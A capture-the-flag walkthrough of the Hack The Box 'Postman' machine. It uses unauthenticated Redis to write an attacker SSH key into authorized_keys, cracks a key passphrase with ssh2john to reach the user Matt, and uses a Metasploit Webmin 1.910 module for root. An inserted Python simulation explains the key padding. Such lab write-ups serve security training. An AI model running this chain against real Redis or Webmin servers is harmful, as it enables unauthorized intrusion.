Let’s get started!

Level: medium


The first step is to scan the machine for open services.

COMMAND: nmap -sC -sV -oN postman

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Following the indications in Pentesting Redis of the HackTricks book, I tried to connect to Redis
without credentials (and it worked!) and extracted some information from the service.
The most interesting piece of information was the path of the .ssh folder of the redis user inside
the box:

COMMAND: redis-cli -h

After going through the output I found the path to the .ssh folder.

Knowing this path and following the indications in Pentesting Redis of the HackTricks book, I
created a new SSH key pair, wrote the public key into the authorized_keys file and logged in via
SSH as the redis user:

Generate an SSH key pair with ssh-keygen.

COMMAND: ssh-keygen

(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt  

Adding blank lines before and after the public key ensures that sshd parses it correctly: the RDB file that Redis writes on save wraps the stored value in binary header and trailer bytes, and the padding puts the key on a line of its own, so sshd skips the binary lines and accepts the key line.

cat foo.txt | redis-cli -h -x set crackit


redis-cli -h
> config set dir /var/lib/redis/.ssh
OK
> config set dbfilename "authorized_keys"
OK
> save
OK
> quit
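To see why the blank-line padding matters, here is an added Python example (not code from the original writeup) that simulates the round trip: the padded and the unpadded payload are each wrapped in constructed RDB-like header and trailer bytes, and a simplified line-oriented authorized_keys parser in the spirit of sshd is run over the result. The header/trailer bytes, the throwaway key and the parser itself are assumptions made for the illustration, not real Redis or OpenSSH code.

```python
import base64
import re

# Constructed stand-in for the bytes Redis writes around a string value in an
# RDB dump: a "REDIS0009" magic plus aux fields in front, and a checksum
# trailer behind. The exact bytes are illustrative, not a real RDB encoding;
# what matters is that they contain no newline and sit directly next to the value.
RDB_HEADER = b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07crackit"
RDB_TRAILER = b"\xff\x8a\x1d\xf2\xb7\x9e\xc3\x12\xab"

# Constructed throwaway ed25519 public key (wire blob is the key type plus 32
# dummy bytes); it is not anyone's real key.
_BLOB = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + b"A" * 32
PUBKEY = b"ssh-ed25519 " + base64.b64encode(_BLOB) + b" redis@attacker"

KEY_LINE = re.compile(rb"^(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp\d{3}) ([A-Za-z0-9+/=]+)(?: .*)?$")


def build_payload(pubkey: bytes, pad: bool = True) -> bytes:
    """Value stored under the 'crackit' key. With pad=True this mirrors
    (echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > foo.txt; echo -e adds
    its own trailing newline, so each side gets three."""
    return b"\n\n\n" + pubkey + b"\n\n\n" if pad else pubkey


def simulate_rdb_dump(value: bytes) -> bytes:
    """Approximate file contents after CONFIG SET dir/dbfilename + SAVE."""
    return RDB_HEADER + value + RDB_TRAILER


def parse_authorized_keys(data: bytes) -> list:
    """Line-oriented parsing in the spirit of sshd: every line is judged on
    its own, and a line that is not 'type base64 [comment]' is skipped rather
    than invalidating the whole file. (Real sshd also accepts option prefixes
    and more key types; that is not needed for this demonstration.)"""
    accepted = []
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        m = KEY_LINE.match(line)
        if m is None:
            continue
        try:
            blob = base64.b64decode(m.group(2), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # The first length-prefixed string in the blob must repeat the key type.
        ktype = m.group(1)
        if blob[4:4 + len(ktype)] != ktype:
            continue
        accepted.append(line)
    return accepted


def key_accepted(pad: bool) -> bool:
    """Does the key survive the trip through Redis with / without padding?"""
    dump = simulate_rdb_dump(build_payload(PUBKEY, pad=pad))
    return PUBKEY in parse_authorized_keys(dump)


if __name__ == "__main__":
    print("padded  :", key_accepted(pad=True))    # True
    print("unpadded:", key_accepted(pad=False))   # False
```

Without the padding the key shares a line with the RDB header and trailer bytes, so no line matches the key syntax and the file contains no usable key; with the padding the binary lines are skipped and the key line is accepted on its own.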

Now connect via SSH as the redis user using the generated private key.

Once inside the machine, I enumerated it with the linpeas script from the PEASS suite.
The script found one interesting file:

which turns out to look like the private SSH key of the user Matt.

After downloading it, extracting the hash from the key in john format (ssh2john) and cracking it, you
find that the passphrase used to encrypt the key is computer2008.

But if you try to log into Matt's account via SSH using the extracted key with that
passphrase, you won't be able to. This is because it is not Matt's current private SSH key.
However, computer2008 is also Matt's password, so you can su to Matt.


If you try to log into the Webmin service at https://Postman:10000 using the discovered
credentials (Matt : computer2008) you will see that they work!
Then, knowing valid credentials and the version of the running software (Webmin 1.910),

we can exploit a well known vulnerability of this version of the service.
Just exploit it using the Metasploit module. To do so, set the password, username,
rhosts, and ssl (to true).

If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r

